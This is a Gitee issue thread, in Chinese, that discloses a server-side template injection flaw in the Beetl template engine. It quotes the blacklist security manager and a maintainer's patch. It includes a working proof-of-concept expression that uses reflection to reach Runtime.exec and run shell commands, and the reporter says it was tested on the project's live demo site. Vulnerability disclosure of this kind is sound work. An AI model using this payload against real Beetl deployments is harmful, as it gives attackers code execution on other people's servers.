91 Star 495 Fork 108

闲.大赋(李家智) / Beetl

 / 详情

Beetl 存在 SSTI 漏洞[BUG]

待办的
创建于  
2023-03-31 10:21

对比其他模板引擎,Beetl的安全策略需要加强

Beetl-3.15.0-vuln-poc

Beetl直到最新版本都存在SSTI(模版注入)漏洞

  • 对于安全管理器的策略采用的是黑名单的机制
public class DefaultNativeSecurityManager implements NativeSecurityManager{

        @Override
        public boolean permit(String resourceId, Class c, Object target, String method){
                if (c.isArray()){
                        //允许调用,但实际上会在在其后调用中报错。不归此处管理
                        return true;
                }
                String name = c.getSimpleName();
                String pkg = c.getPackage().getName();
                if (pkg.startsWith("java.lang")){
                        if (name.equals("Runtime") || name.equals("Process") || name.equals("ProcessBuilder")
                                        || name.equals("System")){
                                return false;
                        }
                }
                return true;
        }
}
  • 如果使用反射(java reflect)即可以绕过黑名单的一切策略

  • poc

${@Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("s='open -a Calculator';java.lang.Runtime.getRuntime().exec(s);")}
ilOcbN.png
  • 拿官方的网站做例子 我输入了以下payload仅用于测试

ilbloa.png

  • 并成功拿到服务器的控制权限
ilbpyZ.png

修复建议

  • 限制反射(java reflect)

报告人

@陈再

参考

评论 (2)

陈再 创建了任务
陈再 修改了描述
展开全部操作日志

同问这个问题,很早就这个问题,一直到现在好像没有修复,以前好多用beetl都貌似都有这个问题

@陈再 多谢,我增加了禁用Class,调用

 if (pkgName.startsWith("java.lang")) {
            return !className.equals("Runtime")
                    && !className.equals("Process")
                    && !className.equals("ProcessBuilder")
					&& !className.equals("Class")
                    && !className.equals("System");
}

@lsw beetl可以设置禁用本地java调用,可以避免这个问题,也可以自定义安全管理器来避免,比如像我这样,增加对class的限制。 而且如果应用不像beetl在线体验网站对外暴露,应该是没有这个问题的。 他不像JSON安全漏洞那样具备普偏性。 你说好多用beetl的,能举几个例子么?

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(3)
29 xiandafu 1678706040
Java
1
https://gitee.com/xiandafu/beetl.git
git@gitee.com:xiandafu/beetl.git
xiandafu
beetl
Beetl

搜索帮助